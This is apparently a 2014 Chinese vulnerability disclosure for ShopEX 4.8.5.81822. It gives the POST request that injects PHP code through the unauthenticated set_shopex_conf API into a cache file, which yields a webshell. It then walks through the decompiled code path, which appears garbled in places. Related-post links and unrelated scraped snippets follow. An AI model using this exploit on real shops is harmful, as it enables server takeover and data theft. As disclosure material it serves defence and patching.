ShopEX 4.8.5.81822 前台Getshell

作者:unhonker   发布:2014-06-23 00:12   分类:漏洞公布   被撸:8,179次   抢沙发  
 

利用方式:
Post提交

Post Data

conf_key=<!--?php phpinfo();?-->.yyyyy&amp;conf_val=test

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&amp;api_version=5.0

Shell地址:

http://127.0.0.1/shopex-single-4.8.5.81822/home/cache/cachedata.stat.php

提交后:

漏洞成因(解密后的代码错乱,只看关键的,无关代码已经略去)

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0

api.php中10-11行

        require(CORE_DIR.'/api/shop_api.php');

        $system = new shop_api();

core/api/shop_api.php中

<?php

require_once( CORE_DIR."/kernel.php" );

require_once( CORE_DIR."/func_ext.php" );

class shop_api extends kernel

{

/**省略**/

        public function shop_api( )

    {

                $apiAct = $_REQUEST['act'];

        $APIs = include( CORE_DIR."/api/include/api_link.php" );

        $apiVersion = $_REQUEST['api_version' ) && $APIs[$apiAct][$apiVersion];

        $api = $APIs[$apiAct][$apiVersion];

                if(!$APIs[$apiAct][$apiversion]['n_varify' && !$this->verfy($_POST)){

            $this->error_handle('veriy fail');//n_varify=1,不需要经过verfy()函数处理

                }

        include( CORE_DIR."/api/shop_api_object.php" );

                include( CORE_DIR."/".dirname( $ctl )."/".$apiVersion."/".basename( $ctl ).".php" );

        $ctl = basename( $ctl );

        $act = $api['act'];

        if ( !class_exists( $ctl ) || !( $ctlObj = new $ctl( ) ) || !method_exists( $ctlObj, $act ) )

        {

            $this->error_handle( "service error", "can not service" );

        }

        /***下面应该是调用set_shopex_conf函数***/

        $ctlObj->$act($_POST);

        /**省略**/

    }

/**省略**/

?>

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

conf_key=<?php phpinfo();?>.yyyyy&conf_val=test

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

core/api/include/api_link.php中

$APIs['set_shopex_conf']=Array ( [5.0 => Array ( [ctl => api/site/api_5_0_site [act => set_shopex_conf [n_varify => 1 ) ); n_varify=1,不需要经过verfy()函数处理

coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

public function set_shopex_conf( $data )

    {

        error_log( var_export( $data, 1 ), 3, __FILE__.( ".log" ) );//写入了coreapisite5.0api_5_0_site.php.log

        $this->system->setConf( $data['conf_key'], $data['conf_val' );//即setConf('<?php phpinfo();?>.yyyyy','test');

        $this->api_response( "true", false, "succ" );

    }

corekernel.php中

    public function setConf( $key, $data, $immediately = false )

    {

        return $this->__setting->set( $key, $data, $immediately );

        /***省略***/

    }

coreinclude_v5setmgr.php中

public function set( $key, $value, $immediately = false )//即set('<?php phpinfo();?>.yyyyy','test');

    {

        if ( !( $pos = strpos( $key, "." ) ) )

        {

            return;

        }

        $sub = substr( $key, $pos + 1 );

        if ( "*" == $sub )

        {

            $this->_pool[substr( $key, 0, $pos = $value;

        }

        else

        {

            $this->_pool[substr( $key, 0, $pos )][$sub = $value;//$this->_pool['<?php phpinfo();?>']['yyyyy']='test';

        }

        if ( $immediately )

        {

            return $this->_save( );

        }

        register_shutdown_function( array( $this, "_save" ) );//脚本执行完成时将调用_save函数[url]http://www.php.net/manual/zh/fun[/url] ... utdown-function.php

        return true;

    }

coreinclude_v5setmgr.php中

public function _save( )

    {

        $db =& $this->system->database( );

        $vary = array( );

        foreach ( $this->_pool as $domain => $values )

        {

            $this->_bool_data_varify( $domain.".".key( $values ), $values );

            $rs = $db->quote( $domain )( "select * from sdb_settings where s_name=".$db->quote( $domain ) );

            $row = $db->getRows( $rs );

            $data = unserialize( $row[0]['s_data' );

            $values = $data ? array_merge( $data, $values ) : $values;

            $send = array( "s_name" => $domain, "s_data" => $values, "s_time" => time( ) );

            $sql = $db->getUpdateSql( $rs, $send, true );

            if ( $sql )

            {

                $db->exec( $sql );

            }

            $vary["SETTING_".$domain = 1;

        }

        $this->system->cache->setModified( array_keys( $vary ) );//调用此函数将$this->_pool数组的键名写入到home/cache/cachedata.stat.php中

        return true;

    }

pluginsfunctionscache_secache.php中

    function cache_secache(){

        $this->workat(HOME_DIR.'/cache/cachedata');

        $statfile = HOME_DIR.'/cache/cachedata.stat.php';

        if(file_exists($statfile)){

            $this->_stat_rs = fopen($statfile,'rb+');

            $contents = '';

            while (!feof($this->_stat_rs)) {

                $contents .= fread($this->_stat_rs, 4096);

            }

            $this->_vary_list = unserialize($contents);

        }else{

            $this->_stat_rs = fopen($statfile,'wb+');

            $this->_vary_list = array();

        }

    }

function setModified($key){

        $now = time();

        if(is_array($key)){

            foreach($key as $k){

                $this->_vary_list[strtoupper($k = $now;

            }

        }else{

            $this->_vary_list[strtoupper($key = $now;

        }

        fseek($this->_stat_rs,0);

        ftruncate($this->_stat_rs,0);

        return fputs($this->_stat_rs,serialize($this->_vary_list));//最终写入到 home/cache/cachedata.stat.php

    }

home/cache/cachedata.stat.php开头没有一共写到两个文件
/core/api/site/5.0/api_5_0_site.php.log 此处apache配置不当的话也可能会当作php解析
/home/cache/cachedata.stat.php

ShopEX 4.8.5.81822 前台Getshell的更多相关文章

  1. phpcms v9 前台getshell脚本

    phpcms v9 前台getshell脚本 用法:python phpcmsv9getshell.py http://baidu.com # -*- coding:utf-8 -*- ''' --- ...

  2. PHP7CMS 无条件前台GETSHELL

    PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的.   01 0 ...

  3. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  4. PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)

    PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在 ...

  5. 利用Thinkphp 5缓存漏洞实现前台Getshell

    0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销.而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能.(漏洞详情见参考资料) 本文将会详细讲解: 1 ...

  6. phpcms9 从注入点入手和 从前台getshell

    弄了3天了  这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 us ...

  7. ThinkSNS2.5前台getshell+后台任意文件删除

    12年爆出的一个洞 前几天比赛的一个cms  于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 <?php /* * 自动缩略图 参数 url|w|h|type=" ...

  8. [代码审计]某开源商城前台getshell

    0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来. 下面就分享一下自己审这套系统的整个过程. 0x01 系统简介 略   0x02 审计入口 看到inc\functi ...

  9. 代码审计之seacms v6.54 前台Getshell 复现分析

    1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ( ...

随机推荐

  1. 简单的IOS6和IOS7通过图片名适配

    在美工提供图片图片的前提下,只需要下面给UIImage做一个分类,就可以简单的实现在6和7上的图片名字适配. 比如美工在6上面提供的图片叫common_button_big_red_highlight ...

  2. ButterKnife View 注入

    /***************************************************************************************** * ButterK ...

  3. C++调试技巧

    编号:1010时间:2016年5月13日11:15:20功能:C++调试技巧http://www.cnblogs.com/lidabo/p/3631055.html

  4. SecureCRT相关

    -------------------------------------------------- 如何解决SecureCRT汉字乱码的问题? 选择工具栏上的“选项”菜单在打开的下拉菜单中选择“会话 ...

  5. jsb游戏闪退 ScriptingScore::executeFunctionWithOwner 出错

    Assertion failure: thing, at...gc/Marking.cpp:112 遇到个jsb的bug,全公司的人整整折腾了2天!! 描述: 下面代码,在GC后,程序崩溃,错误log ...

  6. 在虚拟上安装kali

    1.创建新的虚拟机 2.选择典型 下一步 3.选安装程序光盘映像文件:写入自己.iso的位置 4.linux--Ubuntu 5.给虚拟机名称 虚拟机在你电脑的位置 6.最大自盘自己定义 7.选自定义 ...

  7. HTTP 简介

    HTTP 简介 HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传 ...

  8. SFTP 上传文件夹

    使用sftp上传文件夹时若使用如下命令并不work: put /media/Research/GWAS_Class/* Desktop/ 此时,需要添加一个参数 -r, 另外在目标文件夹下面建立一个同 ...

  9. UI学习笔记---第二天

    程序的执行流程 一.自定义视图 自定义UILebal-UITextField视图 ⾃定义视图:系统标准UI之外,⾃己组合而出的新的视图. 实际开发中,我们还需⾃定义视图.积累⾃己的代码库.⽅便开发. ...

  10. ZSDR017-客户订货价格和库存

    *----------------------------------------------------------------------*ZSDR017-客户订货价格和库存*---------- ...